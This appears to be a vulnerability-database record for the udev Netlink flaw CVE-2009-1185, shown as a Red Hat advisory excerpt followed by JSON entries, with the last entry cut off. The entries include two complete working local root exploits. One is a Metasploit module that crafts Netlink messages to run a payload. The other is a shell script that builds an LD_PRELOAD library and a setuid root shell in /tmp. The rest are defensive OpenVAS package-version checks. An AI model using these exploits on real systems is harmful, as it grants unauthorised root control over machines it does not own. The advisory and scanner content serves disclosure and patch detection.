udev provides a user-space API and implements a dynamic device directory,
providing only the devices present on the system. udev replaces devfs in
order to provide greater hot plug functionality. Netlink is a datagram
oriented service, used to transfer information between kernel modules and
user-space processes.
It was discovered that udev did not properly check the origin of Netlink
messages. A local attacker could use this flaw to gain root privileges via
a crafted Netlink message sent to udev, causing it to create a
world-writable block device file for an existing system block device (for
example, the root file system). (CVE-2009-1185)
Red Hat would like to thank Sebastian Krahmer of the SUSE Security Team for
responsibly reporting this flaw.
Users of udev are advised to upgrade to these updated packages, which
contain a backported patch to correct this issue. After installing the
update, the udevd daemon will be restarted automatically.
{"packetstorm": [{"lastseen": "2016-12-05T22:18:45", "description": "", "cvss3": {}, "published": "2012-09-14T00:00:00", "type": "packetstorm", "title": "Linux udev Netlink Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2012-09-14T00:00:00", "id": "PACKETSTORM:116524", "href": "https://packetstormsecurity.com/files/116524/Linux-udev-Netlink-Local-Privilege-Escalation.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \nrequire 'rex' \nrequire 'msf/core/post/common' \nrequire 'msf/core/post/file' \nrequire 'msf/core/post/linux/priv' \nrequire 'msf/core/exploit/local/linux_kernel' \nrequire 'msf/core/exploit/local/linux' \nrequire 'msf/core/exploit/local/unix' \n \n#load 'lib/msf/core/post/file.rb' \n#load 'lib/msf/core/exploit/local/unix.rb' \n#load 'lib/msf/core/exploit/local/linux.rb' \n#load 'lib/msf/core/exploit/local/linux_kernel.rb' \n \nclass Metasploit4 < Msf::Exploit::Local \nRank = GreatRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Post::File \ninclude Msf::Post::Common \n \ninclude Msf::Exploit::Local::LinuxKernel \ninclude Msf::Exploit::Local::Linux \ninclude Msf::Exploit::Local::Unix \n \ndef initialize(info={}) \nsuper( update_info( info, { \n'Name' => 'Linux udev Netlink Local Privilege Escalation', \n'Description' => %q{ \nVersions of udev < 1.4.1 do not verify that netlink messages are \ncoming from the kernel. This allows local users to gain privileges by \nsending netlink messages from userland. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'kcope', # discovery \n'Jon Oberheide', # 95-udev-late.rules technique \n'egypt' # metasploit module \n], \n'Platform' => [ 'linux' ], \n'Arch' => [ ARCH_X86 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'References' => \n[ \n[ 'CVE', '2009-1185' ], \n[ 'BID', '34536' ], \n], \n'Targets' => \n[ \n[ 'Linux x86', { 'Arch' => ARCH_X86 } ], \n[ 'Linux x64', { 'Arch' => ARCH_X86_64 } ], \n#[ 'Command payload', { 'Arch' => ARCH_CMD } ], \n], \n'DefaultOptons' => { 'WfsDelay' => 2 }, \n'DefaultTarget' => 0, \n'DisclosureDate' => \"\", \n} \n)) \nregister_options([ \nOptString.new(\"WritableDir\", [ true, \"A directory where we can write files (must not be mounted noexec)\", \"/tmp\" ]), \nOptInt.new(\"NetlinkPID\", [ false, \"Usually udevd pid-1. Meterpreter sessions will autodetect\" ]), \n], self.class) \nend \n \ndef exploit \n \nif datastore[\"NetlinkPID\"] and datastore[\"NetlinkPID\"] != 0 \nnetlink_pid = datastore[\"NetlinkPID\"] \nelse \nprint_status(\"Attempting to autodetect netlink pid...\") \nnetlink_pid = autodetect_netlink_pid \nend \n \nif not netlink_pid \nprint_error \"Couldn't autodetect netlink PID, try specifying it manually.\" \nprint_error \"Look in /proc/net/netlink for a PID near that of the udevd process\" \nreturn \nelse \nprint_good \"Found netlink pid: #{netlink_pid}\" \nend \n \nsc = Metasm::ELF.new(@cpu) \nsc.parse %Q| \n#define DEBUGGING \n#define NULL ((void*)0) \n#ifdef __ELF__ \n.section \".bss\" rwx \n.section \".text\" rwx \n.entrypoint \n#endif \ncall main \npush eax \ncall exit \n| \n \n# Set up the same include order as the bionic build system. \n# See external/source/meterpreter/source/bionic/libc/Jamfile \ncparser.lexer.include_search_path = [ \n\"external/source/meterpreter/source/bionic/libc/include/\", \n\"external/source/meterpreter/source/bionic/libc/private/\", \n\"external/source/meterpreter/source/bionic/libc/bionic/\", \n\"external/source/meterpreter/source/bionic/libc/kernel/arch-x86/\", \n\"external/source/meterpreter/source/bionic/libc/kernel/common/\", \n\"external/source/meterpreter/source/bionic/libc/arch-x86/include/\", \n] \n \ncparser.parse(%Q| \n#define DEBUGGING \n// Fixes a parse error in bionic's libc/kernel/arch-x86/asm/types.h \n#ifndef __extension__ \n#define __extension__ \n#endif \n// Fixes a parse error in bionic's libc/include/sys/cdefs_elf.h \n// Doing #if on an undefined macro is fine in GCC, but a parse error in \n// metasm. \n#ifndef __STDC__ \n#define __STDC__ 0 \n#endif \n#include <sys/types.h> \n#include <stdarg.h> \n#include <stdio.h> \n#include <unistd.h> \n#include <errno.h> \n|) \n \n[ \n\"external/source/meterpreter/source/bionic/libc/bionic/__errno.c\", \n\"external/source/meterpreter/source/bionic/libc/bionic/__set_errno.c\", \n\"external/source/meterpreter/source/bionic/libc/stdio/stdio.c\", \n].each do |fname| \ncparser.parse(File.read(fname), fname) \nend \n \npayload_path = \"#{datastore[\"WritableDir\"]}/#{Rex::Text.rand_text_alpha(10)}\" \nevil_path = \"#{datastore[\"WritableDir\"]}/#{Rex::Text.rand_text_alpha(10)}\" \n \nunix_socket_h(sc) \nlinux_x86_syscall_wrappers(sc) \n \nmain = %Q^ \n#include <string.h> \n#include <linux/netlink.h> \n \nint main() { \nint sock; \nstruct iovec iov; \nstruct sockaddr_nl sa; \nstruct msghdr msg; \nchar *mp; \nchar message[4096]; \n \nmemset(sa, 0, sizeof(sa)); \nsa.nl_family = AF_NETLINK; \nsa.nl_pid = #{netlink_pid}; \nsa.nl_groups = 0; \n \nmsg.msg_name = (void *)&sa; \nmsg.msg_namelen = sizeof(sa); \nmsg.msg_iov = &iov; \nmsg.msg_iovlen = 1; \n \nsock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT); \nbind(sock, (struct sockaddr *) &sa, sizeof(sa)); \n \nmp = message; \nmp += sprintf(mp, \"remove@/d\") + 1; \nmp += sprintf(mp, \"SUBSYSTEM=block\") + 1; \nmp += sprintf(mp, \"DEVPATH=/dev/#{Rex::Text.rand_text_alpha(10)}\") + 1; \nmp += sprintf(mp, \"TIMEOUT=10\") + 1; \nmp += sprintf(mp, \"ACTION=remove\") +1; \nmp += sprintf(mp, \"REMOVE_CMD=#{payload_path}\") +1; \n \niov.iov_base = (void*)message; \niov.iov_len = (int)(mp-message); \n \nsendmsg(sock, &msg, 0); \n \nclose(sock); \n \nreturn 0; \n} \n^ \ncparser.parse(main, \"main.c\") \n \nasm = cpu.new_ccompiler(cparser, sc).compile \n \nsc.parse asm \n \nsc.assemble \n \nbegin \nelf = sc.encode_string \nrescue \nprint_error \"Metasm Encoding failed: #{$!}\" \nelog \"Metasm Encoding failed: #{$!.class} : #{$!}\" \nelog \"Call stack:\\n#{$!.backtrace.join(\"\\n\")}\" \nreturn \nend \n \npl = payload.encoded_exe \nprint_status \"Writing payload executable (#{pl.length} bytes) to #{payload_path}\" \nwrite_file(payload_path, pl) \n \nprint_status \"Writing exploit executable (#{elf.length} bytes) to #{evil_path}\" \nwrite_file(evil_path, elf) \n \nprint_status \"chmod'ing and running it...\" \ncmd_exec(\"chmod 755 #{evil_path} #{payload_path}\") \ncmd_exec(\"#{evil_path}\") \n \nrm_f(evil_path, payload_path) \nend \n \ndef autodetect_netlink_pid \nnetlink_pid = nil \n \ncase session.type \nwhen \"meterpreter\" \nprint_status(\"Meterpreter session, using get_processes to find netlink pid\") \nprocess_list = session.sys.process.get_processes \nudev_proc = process_list.find {|p| p[\"name\"] =~ /udevd/ } \nudev_pid = udev_proc[\"pid\"] \nprint_status \"udev pid: #{udev_pid}\" \nnetlink = read_file(\"/proc/net/netlink\") \nnetlink.each_line do |line| \npid = line.split(/\\s+/)[2].to_i \nif pid == udev_pid - 1 \nnetlink_pid = pid \nbreak \nend \nend \nelse \nprint_status(\"Shell session, trying sh script to find netlink pid\") \nnetlink_pid = cmd_exec( \n%q^ \nfor netlink_pid in $(awk '{print $3}' /proc/net/netlink |sort -u|grep -v -- -); do \nfor udev_pid in $(ps aux | grep [u]devd | awk '{print $2}'); do \n[ $(( $udev_pid-1 )) = $netlink_pid ] && echo $netlink_pid ; \ndone; \ndone ^) \nnetlink_pid = nil if netlink_pid.empty? \nend \n \nnetlink_pid \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/116524/udev_netlink.rb.txt"}, {"lastseen": "2016-12-05T22:16:28", "description": "", "cvss3": {}, "published": "2009-04-20T00:00:00", "type": "packetstorm", "title": "Linux 2.6 Kernel UDEV Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2009-04-20T00:00:00", "id": "PACKETSTORM:76813", "href": "https://packetstormsecurity.com/files/76813/Linux-2.6-Kernel-UDEV-Exploit.html", "sourceData": "`#!/bin/sh \n# Linux 2.6 \n# bug found by Sebastian Krahmer \n# \n# lame sploit using LD technique \n# by kcope in 2009 \n# tested on debian-etch,ubuntu,gentoo \n# do a 'cat /proc/net/netlink' \n# and set the first arg to this \n# script to the pid of the netlink socket \n# (the pid is udevd_pid - 1 most of the time) \n# + sploit has to be UNIX formatted text :) \n# + if it doesn't work the 1st time try more often \n# \n# WARNING: maybe needs some FIXUP to work flawlessly \n## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang \n \ncat > udev.c << _EOF \n#include <fcntl.h> \n#include <stdio.h> \n#include <string.h> \n#include <stdlib.h> \n#include <unistd.h> \n#include <dirent.h> \n#include <sys/stat.h> \n#include <sysexits.h> \n#include <wait.h> \n#include <signal.h> \n#include <sys/socket.h> \n#include <linux/types.h> \n#include <linux/netlink.h> \n \n#ifndef NETLINK_KOBJECT_UEVENT \n#define NETLINK_KOBJECT_UEVENT 15 \n#endif \n \n#define SHORT_STRING 64 \n#define MEDIUM_STRING 128 \n#define BIG_STRING 256 \n#define LONG_STRING 1024 \n#define EXTRALONG_STRING 4096 \n#define TRUE 1 \n#define FALSE 0 \n \nint socket_fd; \nstruct sockaddr_nl address; \nstruct msghdr msg; \nstruct iovec iovector; \nint sz = 64*1024; \n \nmain(int argc, char **argv) { \nchar sysfspath[SHORT_STRING]; \nchar subsystem[SHORT_STRING]; \nchar event[SHORT_STRING]; \nchar major[SHORT_STRING]; \nchar minor[SHORT_STRING]; \n \nsprintf(event, \"add\"); \nsprintf(subsystem, \"block\"); \nsprintf(sysfspath, \"/dev/foo\"); \nsprintf(major, \"8\"); \nsprintf(minor, \"1\"); \n \nmemset(&address, 0, sizeof(address)); \naddress.nl_family = AF_NETLINK; \naddress.nl_pid = atoi(argv[1]); \naddress.nl_groups = 0; \n \nmsg.msg_name = (void*)&address; \nmsg.msg_namelen = sizeof(address); \nmsg.msg_iov = &iovector; \nmsg.msg_iovlen = 1; \n \nsocket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT); \nbind(socket_fd, (struct sockaddr *) &address, sizeof(address)); \n \nchar message[LONG_STRING]; \nchar *mp; \n \nmp = message; \nmp += sprintf(mp, \"%s@%s\", event, sysfspath) +1; \nmp += sprintf(mp, \"ACTION=%s\", event) +1; \nmp += sprintf(mp, \"DEVPATH=%s\", sysfspath) +1; \nmp += sprintf(mp, \"MAJOR=%s\", major) +1; \nmp += sprintf(mp, \"MINOR=%s\", minor) +1; \nmp += sprintf(mp, \"SUBSYSTEM=%s\", subsystem) +1; \nmp += sprintf(mp, \"LD_PRELOAD=/tmp/libno_ex.so.1.0\") +1; \n \niovector.iov_base = (void*)message; \niovector.iov_len = (int)(mp-message); \n \nchar *buf; \nint buflen; \nbuf = (char *) &msg; \nbuflen = (int)(mp-message); \n \nsendmsg(socket_fd, &msg, 0); \n \nclose(socket_fd); \n \nsleep(10); \nexecl(\"/tmp/suid\", \"suid\", (void*)0); \n} \n \n_EOF \ngcc udev.c -o /tmp/udev \ncat > program.c << _EOF \n#include <unistd.h> \n#include <stdio.h> \n#include <sys/types.h> \n#include <stdlib.h> \n \nvoid _init() \n{ \nsetgid(0); \nsetuid(0); \nunsetenv(\"LD_PRELOAD\"); \nexecl(\"/bin/sh\",\"sh\",\"-c\",\"chown root:root /tmp/suid; chmod +s /tmp/suid\",NULL); \n} \n \n_EOF \ngcc -o program.o -c program.c -fPIC \ngcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles \ncat > suid.c << _EOF \nint main(void) { \nsetgid(0); setuid(0); \nexecl(\"/bin/sh\",\"sh\",0); } \n_EOF \ngcc -o /tmp/suid suid.c \ncp libno_ex.so.1.0 /tmp/libno_ex.so.1.0 \n/tmp/udev $1 \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/76813/udev.txt"}], "openvas": [{"lastseen": "2018-04-06T11:37:35", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n udev\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "SLES10: Security update for udev", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231065831", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065831", "sourceData": "#\n#VID slesp2-udev-6153\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for udev\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n udev\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65831\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2009-1185\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES10: Security update for udev\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~085~30.52\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-03-14T19:05:20", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-08-09T00:00:00", "type": "openvas", "title": "CentOS Update for libvolume_id-095 CESA-2009:0427 centos5 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310880822", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880822", "sourceData": "# Copyright (C) 2011 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2009-April/015797.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880822\");\n script_version(\"2020-03-13T10:06:41+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 10:06:41 +0000 (Fri, 13 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2009:0427\");\n script_cve_id(\"CVE-2009-1185\");\n script_name(\"CentOS Update for libvolume_id-095 CESA-2009:0427 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libvolume_id-095'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"libvolume_id-095 on CentOS 5\");\n script_tag(name:\"insight\", value:\"udev provides a user-space API and implements a dynamic device directory,\n providing only the devices present on the system. udev replaces devfs in\n order to provide greater hot plug functionality. Netlink is a datagram\n oriented service, used to transfer information between kernel modules and\n user-space processes.\n\n It was discovered that udev did not properly check the origin of Netlink\n messages. A local attacker could use this flaw to gain root privileges via\n a crafted Netlink message sent to udev, causing it to create a\n world-writable block device file for an existing system block device (for\n example, the root file system). (CVE-2009-1185)\n\n Red Hat would like to thank Sebastian Krahmer of the SUSE Security Team for\n responsibly reporting this flaw.\n\n Users of udev are advised to upgrade to these updated packages, which\n contain a backported patch to correct this issue. After installing the\n update, the udevd daemon will be restarted automatically.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"CentOS5\") {\n if(!isnull(res = isrpmvuln(pkg:\"libvolume_id\", rpm:\"libvolume_id~095~14.20.el5_3\", rls:\"CentOS5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libvolume_id-devel\", rpm:\"libvolume_id-devel~095~14.20.el5_3\", rls:\"CentOS5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"udev\", rpm:\"udev~095~14.20.el5_3\", rls:\"CentOS5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-06T11:38:29", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n udev\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "SLES10: Security update for udev", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231065817", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065817", "sourceData": "#\n#VID slesp2-udev-6203\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for udev\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n udev\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65817\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2009-1185\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES10: Security update for udev\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~085~30.54\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:37", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n udev\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "SLES10: Security update for udev", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:65817", "href": "http://plugins.openvas.org/nasl.php?oid=65817", "sourceData": "#\n#VID slesp2-udev-6203\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for udev\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n udev\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_id(65817);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2009-1185\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES10: Security update for udev\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~085~30.54\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:36", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libvolume_id1\n udev\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-11T00:00:00", "type": "openvas", "title": "SLES11: Security update for udev", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231065648", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065648", "sourceData": "#\n#VID f2a20a677f8f07b34c3543e781db446f\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for udev\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libvolume_id1\n udev\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=493158\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.65648\");\n 